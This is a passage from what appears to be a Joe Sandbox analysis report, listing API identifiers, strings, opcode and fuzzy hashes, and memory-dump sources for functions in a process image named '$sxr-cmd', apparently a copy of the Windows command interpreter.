                                                                                                                      • Instruction Fuzzy Hash: F021B329E0CE42C5FA645B1994912BEE6A0EF45FB4F5A8036D90EC76A2DF2CEC40D301
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                      • String ID: %s=%s$DPATH$PATH
                                                                                                                      • API String ID: 3731854180-3148396303
                                                                                                                      • Opcode ID: 9406f8792d83d27cffe1043455a016030c7c7ce927c3ef70dd555152c69d15e2
                                                                                                                      • Instruction ID: 33c9a7e0eb1f2193c4ed95e7c673ad97ad8220ca4d3f8872b54ce651227024ee
                                                                                                                      • Opcode Fuzzy Hash: 9406f8792d83d27cffe1043455a016030c7c7ce927c3ef70dd555152c69d15e2
                                                                                                                      • Instruction Fuzzy Hash: 8D214C29B09E56C1EE549F65E4802B9AAB0AF84FA4F884136DD4EC73B5DF2CED408740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcscmp
                                                                                                                      • String ID: *.*$????????.???
                                                                                                                      • API String ID: 3392835482-3870530610
                                                                                                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                      • Instruction ID: 2630a2398721e90aedb65d19b656939d297b3cbd6557849f66cec7f6bb7c65d6
                                                                                                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                      • Instruction Fuzzy Hash: 73115229B24E6281E7648B26E44093AB7A1EB44F94F195032DE8DC7B65DF7DE8918700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: fprintf
                                                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                      • API String ID: 383729395-2781220306
                                                                                                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                      • Instruction ID: db79eeca450afaf38b41d966f944af83ffdd0cb229c845030478f729038c27b8
                                                                                                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                      • Instruction Fuzzy Hash: A211513A948E4291EB559F24E9840B9A671EB44FB0F555332DA7DC32F4EF2CEC858740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswspacewcschr
                                                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                      • API String ID: 287713880-1183017076
                                                                                                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                      • Instruction ID: 5dd429228676dd4c2186383c7daf13307e9bfec3638a4fe36f888773bc75aee7
                                                                                                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                      • Instruction Fuzzy Hash: 80F04425A1AE62C1EA648B11A400176E6A0FF44F65BC69132E95DC2A74DF3CDC40C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                      • API String ID: 1646373207-2530943252
                                                                                                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                      • Instruction ID: 389643387929320aa9c8a20952eac4a675d2c837cd14a7dd388cf8343523ee0e
                                                                                                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                      • Instruction Fuzzy Hash: 0D01DA69E09E06D1EA448B21A851174A7A0EF49F75F851736C93EC2BF0DF3CAD859700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                      • API String ID: 1646373207-919018592
                                                                                                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                      • Instruction ID: 649f85edd84c040fe9a4e63f2b376609e9453408b7288f514dbd751d78fe80ba
                                                                                                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                      • Instruction Fuzzy Hash: 43F0DA29A18B91D2EA049F22F444079EA60FF8DFE0B899535DA4E87B25CF3CD985C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1403193329-0
                                                                                                                      • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                                      • Instruction ID: 133d93104126db85b465dbe5183ddadc31e9deaba187379cc81d3b8642f0d4a8
                                                                                                                      • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                                      • Instruction Fuzzy Hash: 98619232A08B828AE710CB69D4402ADB7A4FB85F68F545236DE5D97BA9DF38D851C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsnicmp$wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3270668897-0
                                                                                                                      • Opcode ID: 3f3184218c0a3873c800f9f69b6126b4a8f2dda69b94c9b294b3267afa7dfc1e
                                                                                                                      • Instruction ID: 1362cc4ce82b955282f69be6bc75ce2d8e67ec27abfdaa5e7c9806a6e3774df1
                                                                                                                      • Opcode Fuzzy Hash: 3f3184218c0a3873c800f9f69b6126b4a8f2dda69b94c9b294b3267afa7dfc1e
                                                                                                                      • Instruction Fuzzy Hash: 42519F5AE08E42C5EB60AF1195101B9E7A0EF45FA8F688036CA4EC72F5DF2CED419350
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DriveFullNamePathType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3442494845-0
                                                                                                                      • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                                      • Instruction ID: cbbe9d95c71dac51407e4691fccb7cfe5e6a23480ce756a3f12a72d587c380ca
                                                                                                                      • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                                      • Instruction Fuzzy Hash: 8A316B36615B828AEB60CF21E8807E9B7A4FB88F94F444135EA5D87B64DF38DA45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                      • Instruction ID: 85c2abf9e9c34adee208fb72f2a32c27ba74692f0423974341d059e4672fef3e
                                                                                                                      • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                      • Instruction Fuzzy Hash: D3419579A08F41C5EB508B69F890365B364FB98FA4FA04136D98D82774DF7DE946C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcstol$lstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3515581199-0
                                                                                                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                      • Instruction ID: 43dd1481b35f5aed69f491ac3edf19cbc09b8da1139e6cbbf91d34288b0476f0
                                                                                                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                      • Instruction Fuzzy Hash: B021953AA08A42C3E6A14B7990A4539EAA0FF49F68F155135DB4FC2665CF6CEC458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_get_osfhandle$TimeWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4019809305-0
                                                                                                                      • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                      • Instruction ID: 7ab9c459e266a03951e938743515944c47bf2ca7d977ceb76b5af71e49edfe9f
                                                                                                                      • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                      • Instruction Fuzzy Hash: 86316469A08A8287E7905F29A484378FBA1AF49FB4F545234D95EC3BB5CF7CDC548700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029679093-0
                                                                                                                      • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                                      • Instruction ID: 5eeb0b8df5cb46b67b6ce5a6f7604a19b123b1f2c9f8db512e053651db638c9c
                                                                                                                      • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                                      • Instruction Fuzzy Hash: 4C312936705A818AEB208F25D8553E9B7A4FB89F98F454136CA8D87B54DF3CEA45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2448200120-0
                                                                                                                      • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                      • Instruction ID: 80ed2fb5830a8dc6f227d349c5b7b3f1c9c547b24aaee2bea99ff06a7dd04b8d
                                                                                                                      • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                      • Instruction Fuzzy Hash: 94214C39A08F46DAE654AF21A440279FAA1FB85FA1F454135D90E837A5CF3CEC418B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                      • Instruction ID: d8868a8ae33d46590d569b622ae7e862535ec2ef49d9c8e7a395e31fd0fd4a17
                                                                                                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                      • Instruction Fuzzy Hash: A1216269A08F42C6EE049B51A900079F7A1FF89FF4B599230DA1E837B5DF3CE8058700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF615503D0C
                                                                                                                        • Part of subcall function 00007FF615503C24: towupper.MSVCRT ref: 00007FF615503D2F
                                                                                                                        • Part of subcall function 00007FF615503C24: iswalpha.MSVCRT ref: 00007FF615503D4F
                                                                                                                        • Part of subcall function 00007FF615503C24: towupper.MSVCRT ref: 00007FF615503D75
                                                                                                                        • Part of subcall function 00007FF615503C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615503DBF
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6ABF
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6AD3
                                                                                                                        • Part of subcall function 00007FF6154F6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6154F6AE8,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B8B
